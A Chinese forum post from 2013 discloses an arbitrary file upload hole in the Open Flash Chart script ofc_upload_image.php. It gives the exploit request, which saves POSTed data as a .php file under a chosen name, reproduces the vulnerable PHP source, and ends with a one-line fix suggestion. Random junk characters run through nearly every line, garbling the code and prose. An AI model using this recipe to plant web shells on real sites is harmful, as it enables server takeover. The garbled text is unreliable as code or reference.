POST 数据漏洞文件执行任意后缀文件保存6 c! S; ^* G) Z8 U8 p
漏洞文件/chart/php-ofc-library/ofc_upload_image.php/ G+ N _ O3 v: b7 s% Y! l4 K- I
8 u9 H7 c9 A* ~ j; ~利用:
4 ?# D' I' E, @- d/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名6 k3 X( j8 K8 X! `1 A
/ j( F0 V7 o7 K: J1 C2 aPost任意数据7 q; _, d- n. X! F- M: c
保存位置http://localhost/chart/tmp-upload-images/hfy.php
1 M' h2 g' Z0 s5 l4 v. W( g9 l- g1 g: x9 e$ k
j8 k% P/ O, ]+ N. M
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~$ w6 x6 Z; y6 ?# {- ^ k) B
# p4 p) i N X E; a+ C' B
<?php. a6 ?6 Y; w; B* C3 V) ~% u8 \6 }" l
: f" }: m4 S3 c- Z' C//# @6 r& X. q. ~
// In Open Flash Chart -> save_image debug mode, you D7 o; Y- b& j
// will see the 'echo' text in a new window.
& f: f; q- x0 Y2 Q. B8 c//
\: \ R/ k9 p3 E- p8 _. \! ~2 b- J
/*
3 T$ i- R5 r) p) P" G) U. x
" |7 @: g, A7 y3 M5 I0 |: ]+ |* [print_r( $_GET );
+ N) t3 Q& G" y/ `& _print_r( $_POST );
1 r# |& E' B/ N* s4 K" Uprint_r( $_FILES );
6 U- ]8 J7 x0 |; E6 K T, F; w, N5 B$ q! @, [
print_r( $GLOBALS );3 m; h4 S9 S7 ]+ l' a% o
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );* |- H+ W: w6 B( N6 q: m- r
* c# Q! O' v- H6 G/ N! `) A% }( k*/. R; t6 w, s( I8 i
// default path for the image to be stored //9 r% R! r3 K8 c# F. _
$default_path = '../tmp-upload-images/';
5 l# ?& O4 O( z* W+ c( G6 x# i3 C
9 k U+ i! `! L* U Aif (!file_exists($default_path)) mkdir($default_path, 0777, true);8 j* j4 S' U2 d' T) S
" t C5 k+ c" B4 v// full path to the saved image including filename //, n* F- O: b6 v3 w
$destination = $default_path . basename( $_GET[ 'name' ] ); 0 ~6 k) @! T/ v4 I# H2 `
: w5 i% z4 G# s+ d9 b; ? n7 vecho 'Saving your image to: '. $destination;
* {" Z/ ?$ p' D$ }7 G- {% T// print_r( $_POST );
G7 }. _2 }: r9 k& K6 F// print_r( $_SERVER );8 W4 N6 z) l- ]; H) Y" V7 G
// echo $HTTP_RAW_POST_DATA;& B. p: ~" u$ z, c+ y
# h( [# F# N& `: n, h
//
" Y3 h8 b, S, K8 Y$ L// POST data is usually string data, but we are passing a RAW .png5 g4 x' c5 n$ S/ d0 c
// so PHP is a bit confused and $_POST is empty. But it has saved
- e' M M/ J2 c1 M* C; o// the raw bits into $HTTP_RAW_POST_DATA9 J1 \1 h# q, a
//. w/ Q4 P7 `- r; v$ v
0 K8 r# Z2 L7 Z! H/ F
$jfh = fopen($destination, 'w') or die("can't open file");3 v/ k6 J; z- Z% S `% }
fwrite($jfh, $HTTP_RAW_POST_DATA);' i; @3 i9 p3 X. \
fclose($jfh);% }* W! J' o/ e- W
9 b( k: K$ K; p/ w
//
& e2 [* s0 Q& M5 L! v _// LOOK:, ^8 F1 O6 {& u3 S5 ?" u& }
//
* C" m* k' a' dexit();
/ F* {2 ~0 h7 w) M' y; i I% i//
4 d2 `# Q; O: J- w1 ]& Z// PHP5:
& ]; |; Y/ L* N4 {& Z//
) i; i+ g _5 p8 p4 @% v
+ Q: u' t/ l: V! K! k& V, `
3 B+ V: \0 D# b$ K: e// default path for the image to be stored //
* g0 Q% R% m6 z+ q% {- a$default_path = 'tmp-upload-images/';
' a/ S& }: G/ ?% h, w9 n1 D* ~ P& `
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
- L1 V$ d1 b/ I8 ^/ m1 b4 F
+ d m6 h% ^6 v' Q/ L// full path to the saved image including filename //
5 U7 C) u; L) q+ ^) b$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); , Y" f- Q, V0 T8 m" f
- Z; V" }5 M; g// move the image into the specified directory //
& i( G+ t: [( Q& Oif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {$ }1 z3 W$ b. L# P7 x: w9 g
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
5 I$ W d2 S* \0 V; r7 ?} else {; z' @" s! {- U9 E# U
echo "FILE UPLOAD FAILED";
& M. W9 |" ]$ E; ?" |* i}
2 D7 q0 ^: d5 F+ ^# A$ b, t: x8 k7 M- S
2 p; R' C B5 b- V
?>! Y5 ?" [% ^: F, m* p4 O3 _
" J1 u0 o% \5 j3 V, [1 Y
: J8 Y) X; b# H
; Q U6 q! r) t, d6 n- b; z; \
" c8 k+ ]. o0 P- R! M
) T! M6 B3 m. j6 c: Y' [# Y+ q6 [" {
, M; [+ p; }* V0 B2 z0 C3 a) X4 y修复方案:
" F# G. }% ]% j2 ~- @这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞 - v9 V( x6 g0 j- {% r
2 f7 F( ?5 Q% D1 ^' K9 g3 F0 t. B3 o1 \1 a
! z% } U4 [* j; S' g
$ l: R* y: m6 p7 W$ N5 c
|
发表于 2013-2-23 12:38:58
收藏
支持
反对